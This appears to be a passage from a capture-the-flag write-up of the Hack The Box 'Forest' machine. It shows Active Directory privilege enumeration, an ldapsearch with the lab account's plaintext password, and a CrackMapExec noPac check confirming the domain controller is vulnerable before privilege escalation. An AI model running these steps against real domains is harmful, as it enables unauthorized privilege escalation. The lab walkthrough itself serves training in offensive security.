Checking privileges of the user is one of the top priority after gaining a foothold
svc-alfresco
*evil-winrm* ps c:\Users\svc-alfresco\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
htb\svc-alfresco S-1-5-21-3072663084-364016917-1341370565-1147
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.The svc-alfresco has SeMachineAccountPrivilege enabled.
This is pretty much expected from a domain user in an Active Directory environment.
By default, a standard user who is part of an Active Directory domain has the SeMachineAccountPrivilege policy enabled and can add up to 10 devices to the domain.
That information is stored at the ms-DS-MachineAccountQuote attribute
It can be checked
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ ldapsearch -x -h ldap://htb.local:389 -D svc-alfresco@htb.local -w 's3rvice' -b 'DC=HTB,DC=LOCAL' -LLL | grep -i ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10It is set to 10
CrackMapExec has a test module for the exploit Let’s go for a test-run
┌──(kali㉿kali)-[~/…/htb/labs/forest/noPac]
└─$ cme smb $IP -u svc-alfresco -p s3rvice -d htb.local -M nopac
smb 10.10.10.161 445 forest [*] windows server 2016 standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
smb 10.10.10.161 445 forest [+] htb.local\svc-alfresco:s3rvice
NOPAC 10.10.10.161 445 FOREST TGT with PAC size 1498
NOPAC 10.10.10.161 445 FOREST TGT without PAC size 701
NOPAC 10.10.10.161 445 FOREST
NOPAC 10.10.10.161 445 FOREST VULNEABLE
nopac 10.10.10.161 445 forest next step: https://github.com/Ridter/noPacthe target system is confirmed to be vulnerable to nopac exploit
Moving on to the Privilege Escalation phase